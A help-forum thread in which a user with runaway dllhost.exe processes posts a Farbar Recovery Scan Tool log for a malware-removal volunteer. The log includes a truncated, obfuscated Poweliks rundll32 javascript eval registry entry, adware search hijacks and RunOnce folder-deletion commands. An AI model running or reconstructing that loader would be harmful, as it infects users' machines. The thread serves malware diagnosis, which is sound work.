Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Multiple dllhost.exe 32 process are created


  • Please log in to reply
6 replies to this topic

#1 rods

rods

  • Members
  • 32 posts
  • OFFLINE
  •  
  • Local time:01:41 AM

Posted 17 October 2014 - 03:41 PM

Hello, I'm having multiple (about 40) dllhost.exe 32 processes being created and using 100% of my CPU. What I've tried doing so far: Ran Malwarebytes antimalware in normal and safe mode - Nothing detected I've disconnected computer from the internet and stopped all dllhost.exe 32 processes. I went to Windows Firewall and tried to block dllhost.exe from outbound connections, but it started again. What should I try next? Thanks in advance!

BC AdBot (Login to Remove)

 


#2 Rootk

Rootk

  • Malware Response Team
  • 234 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Easter Island, Chile.
  • Local time:05:41 AM

Posted 17 October 2014 - 03:58 PM

HI. I'm Rootk and I will be helping you with your problem.

 

Please do the following:

 

Download Farbar Recovery Scan Tool and save it to your desktop. Please pick the version that matches your operating system's bit type. If you don't know which version matches your system, take a look at this link: http://www.bleepingcomputer.com/tutorials/32-bit-or-64-bit-windows/

Double-click to run it. When the tool opens click Yes to disclaimer.
Press Scan button.
It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.



#3 rods

rods
  • Topic Starter

  • Members
  • 32 posts
  • OFFLINE
  •  
  • Local time:01:41 AM

Posted 17 October 2014 - 05:23 PM

Here's the data from FRST.txt

 

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 16-10-2014
Ran by Rod (administrator) on RODWIN7 on 17-10-2014 15:14:42
Running from E:\Documents
Loaded Profiles: Rod & UpdatusUser (Available profiles: Rod & UpdatusUser & Parna)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Cisco WebEx LLC) C:\Windows\SysWOW64\atashost.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files\D-Link\SharePort Plus\Spnuhelper.exe
(Protexis Inc.) C:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\SyncAgent\syncagentsrv.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_w32.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_x64.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe
(Google) C:\Program Files (x86)\Google\Drive\googledrivesync.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Plex, Inc.) C:\Program Files (x86)\Plex\Plex Media Server\Plex Media Server.exe
(PFU LIMITED) C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe
(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 9\Snagit32.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE
(D-Link Corp.) C:\Program Files\D-Link\SharePort Plus\SharePortPlus.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(PFU LIMITED) C:\Program Files (x86)\PFU\ScanSnap\SSFolder\SSFolderTray.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(PFU LIMITED) C:\Windows\SSDriver\fi5110\SsWiaChecker.exe
(PowerISO Computing, Inc.) C:\Program Files (x86)\PowerISO\PWRISOVM.EXE
(Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
(Acronis) C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\TibMounter\TibMounterMonitor.exe
(Renesas Electronics Corporation) C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\rusb3mon.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 9\TscHelp.exe
(Google) C:\Program Files (x86)\Google\Drive\googledrivesync.exe
(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 9\SnagPriv.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 9\SnagitEditor.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Python Software Foundation) C:\Program Files (x86)\Plex\Plex Media Server\PlexScriptHost.exe
(Plex, Inc.) C:\Program Files (x86)\Plex\Plex Media Server\PlexDlnaServer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSACCESS.EXE
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Acronis Scheduler2 Service] => C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe [403328 2012-08-23] (Acronis)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [41336 2014-05-08] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840568 2014-05-08] (Adobe Systems Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-01-20] (Apple Inc.)
HKLM-x32\...\Run: [QuickFinder Scheduler] => c:\Program Files (x86)\Corel\WordPerfect Office X6\Programs\QFSCHD160.EXE [169416 2012-07-30] (Corel Corporation)
HKLM-x32\...\Run: [ScanSnap WIA Service Checker] => C:\Windows\SSDriver\fi5110\SsWiaChecker.exe [86016 2009-09-30] (PFU LIMITED)
HKLM-x32\...\Run: [PWRISOVM.EXE] => C:\Program Files (x86)\PowerISO\PWRISOVM.EXE [180224 2010-04-12] (PowerISO Computing, Inc.)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [KiesTrayAgent] => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe [311616 2014-02-14] (Samsung Electronics Co., Ltd.)
HKLM-x32\...\Run: [TrueImageMonitor.exe] => C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe [6010264 2012-08-23] (Acronis)
HKLM-x32\...\Run: [AcronisTibMounterMonitor] => C:\Program Files (x86)\Common Files\Acronis\TibMounter\TibMounterMonitor.exe [941440 2012-07-24] (Acronis)
HKLM-x32\...\Run: [RUSB3MON] => C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\rusb3mon.exe [115048 2011-09-20] (Renesas Electronics Corporation)
HKLM-x32\...\RunOnce: [DelTr2236071] => cmd.exe /c rd /s /q  "C:\Users\Rod\AppData\Roaming\WSE_Astromenda"
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...\Run: [GoogleDriveSync] => C:\Program Files (x86)\Google\Drive\googledrivesync.exe [22734160 2014-08-08] (Google)
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...\Run: [KiesAirMessage] => C:\Program Files (x86)\Samsung\Kies\KiesAirMessage.exe -startup
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...\Run: [GoogleChromeAutoLaunch_5D23115B3472A07EC056C924025ED1D4] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [854344 2014-10-09] (Google Inc.)
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...\Run: [uTorrent] => C:\Users\Rod\AppData\Roaming\uTorrent\uTorrent.exe [1385808 2014-10-12] (BitTorrent Inc.)
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...\Run: [Plex Media Server] => C:\Program Files (x86)\Plex\Plex Media Server\Plex Media Server.exe [4525192 2014-08-01] (Plex, Inc.)
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...\RunOnce: [WSE_Astromenda] => [X]
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...\RunOnce: [DelTr2236071] => cmd.exe /c rd /s /q  "C:\Users\Rod\AppData\Roaming\WSE_Astromenda"
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass IE RunOnce.lnk
ShortcutTarget: Install LastPass IE RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ScanSnap Manager.lnk
ShortcutTarget: ScanSnap Manager.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Snagit 9.lnk
ShortcutTarget: Snagit 9.lnk -> C:\Program Files (x86)\TechSmith\Snagit 9\Snagit32.exe (TechSmith Corporation)
Startup: C:\Users\Rod\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\Rod\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SharePort Plus.lnk
ShortcutTarget: SharePort Plus.lnk -> C:\Program Files\D-Link\SharePort Plus\SharePortPlus.exe (D-Link Corp.)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
ShellIconOverlayIdentifiers: [AcronisSyncError] -> {934BC6C0-FEC2-4df5-A100-961DE2C8A0ED} => C:\Program Files (x86)\Acronis\TrueImageHome\tishell64.dll (Acronis)
ShellIconOverlayIdentifiers: [AcronisSyncInProgress] -> {00F848DC-B1D4-4892-9C25-CAADC86A215D} => C:\Program Files (x86)\Acronis\TrueImageHome\tishell64.dll (Acronis)
ShellIconOverlayIdentifiers: [AcronisSyncOk] -> {71573297-552E-46fc-BE3D-3DFAF88D47B7} => C:\Program Files (x86)\Acronis\TrueImageHome\tishell64.dll (Acronis)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x3CC8C2417B23CF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
SearchScopes: HKLM - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir=
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir=
SearchScopes: HKCU - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir=
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir=
BHO: SnagIt Toolbar Loader -> {00C6482D-C502-44C8-8409-FCE54AD9C208} -> C:\Program Files (x86)\TechSmith\Snagit 9\DLLx64\SnagitBHO64.dll (TechSmith Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar_x64.dll (LastPass)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: SnagIt Toolbar Loader -> {00C6482D-C502-44C8-8409-FCE54AD9C208} -> C:\Program Files (x86)\TechSmith\Snagit 9\SnagitBHO.dll (TechSmith Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar.dll (LastPass)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} -  No File
Toolbar: HKLM - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar_x64.dll (LastPass)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Snagit - {8FF5E183-ABDE-46EB-B09E-D2AAB95CABE3} - C:\Program Files (x86)\TechSmith\Snagit 9\SnagitIEAddin.dll (TechSmith Corporation)
Toolbar: HKLM-x32 - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar.dll (LastPass)
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://dell.webex.com/client/WBXclient-T29L10NSP4EP2-2/support/ieatgpc1.cab
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF Plugin: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll (LastPass)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass.dll (LastPass)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @vmware.com/vmrc,version=2.5.0.00000 -> C:\Program Files (x86)\Common Files\VMware\VMware VMRC Plug-in\Firefox\np-vmware-vmrc.dll (VMware, Inc.)
FF Plugin-x32: @vmware.com/vmrc,version=5.5.0.00000 -> C:\Program Files (x86)\Common Files\VMware\VMware Remote Console Plug-in 5.5\Firefox\np-vmware-vmrc.dll (VMware, Inc.)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Rod\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF Plugin ProgramFiles/Appdata: C:\Users\Rod\AppData\Roaming\mozilla\plugins\npatgpc.dll (Cisco WebEx LLC)
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2014-02-06]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com
CHR StartupUrls: Default -> "hxxp://www.google.com/", "hxxp://www.yahoo.com/", "hxxp://astromenda.com/?f=7&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir="
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:inputType}{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}{google:searchVersion}{google:sessionToken}{google:prefetchQuery}sugkey={google:suggestAPIKeyParameter}
CHR Profile: C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-02-11]
CHR Extension: (Google Drive) - C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-02-11]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-22]
CHR Extension: (YouTube) - C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-02-11]
CHR Extension: (Google Search) - C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-02-11]
CHR Extension: (avast! Online Security) - C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2014-09-02]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2014-09-09]
CHR Extension: (Google Wallet) - C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-02-11]
CHR Extension: (Gmail) - C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-02-11]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswwebrepchrome-sp.crx []

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 D-Link SharePort Plus Helper; C:\Program Files\D-Link\SharePort Plus\Spnuhelper.exe [49152 2014-09-11] () [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [8192 2005-03-29] ()
R3 rusb3hub; C:\Windows\System32\DRIVERS\rusb3hub.sys [114568 2012-08-27] (Renesas Electronics Corporation)
R3 rusb3xhc; C:\Windows\System32\DRIVERS\rusb3xhc.sys [230280 2012-08-27] (Renesas Electronics Corporation)
R2 sxuptp; C:\Windows\System32\DRIVERS\sxuptp.sys [310472 2014-09-11] (silex technology, Inc.)
R0 tib_mounter; C:\Windows\System32\DRIVERS\tib_mounter.sys [1093256 2014-04-29] (Acronis)
R0 vidsflt; C:\Windows\System32\DRIVERS\vidsflt.sys [166024 2014-04-29] (Acronis)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2017-09-20 16:31 - 2017-09-20 16:31 - 00000000 ____D () C:\ProgramData\Malwarebytes
2017-09-20 16:31 - 2014-10-17 11:07 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-09-20 16:31 - 2014-10-17 11:07 - 00001102 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2017-09-20 16:31 - 2014-10-17 11:07 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2017-09-20 16:31 - 2014-10-17 11:07 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2017-09-20 16:31 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2017-09-20 16:31 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2017-09-20 16:31 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2017-09-20 16:30 - 2017-09-20 16:31 - 17305616 _____ (Malwarebytes Corporation ) C:\Users\Rod\Downloads\mbam-setup-2.0.1.1004.exe
2014-10-17 15:14 - 2014-10-17 15:14 - 00000000 ____D () C:\FRST
2014-10-17 12:33 - 2014-10-17 12:33 - 04965896 _____ (Piriform Ltd) C:\Users\Rod\Downloads\ccsetup418.exe
2014-10-17 12:33 - 2014-10-17 12:33 - 00720336 _____ ( ) C:\Users\Rod\Downloads\FreeYouTubeDownloaderIC (1).exe
2014-10-17 12:32 - 2014-10-17 12:32 - 00720336 _____ ( ) C:\Users\Rod\Downloads\FreeYouTubeDownloaderIC.exe
2014-10-17 12:28 - 2014-10-17 12:28 - 00000000 ____D () C:\Users\Rod\AppData\Roaming\WSE_Astromenda
2014-10-17 12:28 - 2014-10-17 12:28 - 00000000 ____D () C:\Users\Rod\AppData\Roaming\1H1Q1V1N1N1O2V
2014-10-17 12:27 - 2014-10-17 12:27 - 24656704 _____ (Mozilla) C:\Users\Rod\Downloads\Firefox.EXE
2014-10-17 12:27 - 2014-10-17 12:27 - 00831592 _____ ( ) C:\Users\Rod\Downloads\Unconfirmed 215090.crdownload
2014-10-17 12:27 - 2014-10-17 12:27 - 00831592 _____ ( ) C:\Users\Rod\Downloads\FirefoxSetup (3).exe
2014-10-17 12:27 - 2014-10-17 12:27 - 00831592 _____ ( ) C:\Users\Rod\Downloads\FirefoxSetup (1).exe
2014-10-17 12:26 - 2014-10-17 12:26 - 00831592 _____ ( ) C:\Users\Rod\Downloads\FirefoxSetup.exe
2014-10-17 11:34 - 2014-10-17 11:35 - 127289600 _____ (Microsoft Corporation) C:\Users\Rod\Downloads\msert.exe
2014-10-17 11:04 - 2014-10-17 11:04 - 00000000 ____D () C:\Windows\pss
